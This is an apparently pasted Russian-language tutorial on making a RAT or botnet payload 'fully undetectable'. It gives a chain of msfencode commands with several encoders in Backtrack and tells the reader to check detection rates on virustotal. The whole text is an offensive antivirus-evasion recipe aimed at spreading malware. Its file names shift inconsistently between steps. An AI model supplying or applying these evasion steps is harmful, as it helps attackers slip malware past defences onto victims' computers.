^-^

^-^


Что нам необходимо:
1. Backtrack ОС
2. MSF encoders
Итак, наш первый шаг - создать вирусный файл с помощью любого из таких инструментов, как RAT, бот-нет, или что-то еще. Чтобы сделать это FUD (Fully Undetectable), мы используем backtrack.

Прежде чем отправляться в FUD, проверьте файл на virustotal.com, и мы получим коэффициент обнаружения, например, скажем, 30/44

Теперь запустите терминал в Backtrack и перейдите в каталог, в котором находится ваш файл.

E.g. cd Desktop Итак, наш первый шаг - изменить разрешения этого файла (775), введя эту команду:

root@bt:~/Desktop# chmod 775 stub.exe Далее введите эту команду для кодирования вашего вируса:

root@bt:~/Desktop# msfencode -i /root/Desktop/Server.exe -t raw -o /root/Desktop/stub2.exe -e x86/shikata_ga_nai -c 10

Вы заметите, что Антивирус все еще обнаружил это, хотя мы закодировали его 10 раз с “x86/shikata_ga_nai” encoder.

Теперь снова измените разрешения этого выходного файла,

root@bt:~/Desktop# chmod 775 server2.exe

Теперь, 2-й раз, мы используем другой кодировщик с именем «jmp_call_additive» root@bt:~/Desktop# msfencode -i /root/Desktop/Server2.exe -t raw -o /root/Desktop/Server3.exe -e x86/jmp_call_additive -c 1

Теперь снова измените разрешения этого выходного файла,

root@bt:~/Desktop# chmod 775 server3.exe

Теперь снова мы используем другой кодировщик, названный так:

“call4_dword_xor” root@bt:~/Desktop# msfencode -i /root/Desktop/Server3.exe -t raw -o /root/Desktop/Server4.exe -e x86/call4_dword_xor -c 1

Теперь снова измените разрешения этого выходного файла,


root@bt:~/Desktop# chmod 775 server4.exe

Теперь мы окончательно кодируем этот кодировщик “shikata_ga_nai”

root@bt:~/Desktop# msfencode -i /root/Desktop/Server4.exe -o /root/Desktop/final.exe -e x86/shikata_ga_nai -c 1

Теперь снова измените разрешения этого выходного файла,

root@bt:~/Desktop# chmod 775 final.exe Теперь вы получите файл final.exe, загрузите его на virustotal.com, и вы увидите результаты.

Report Page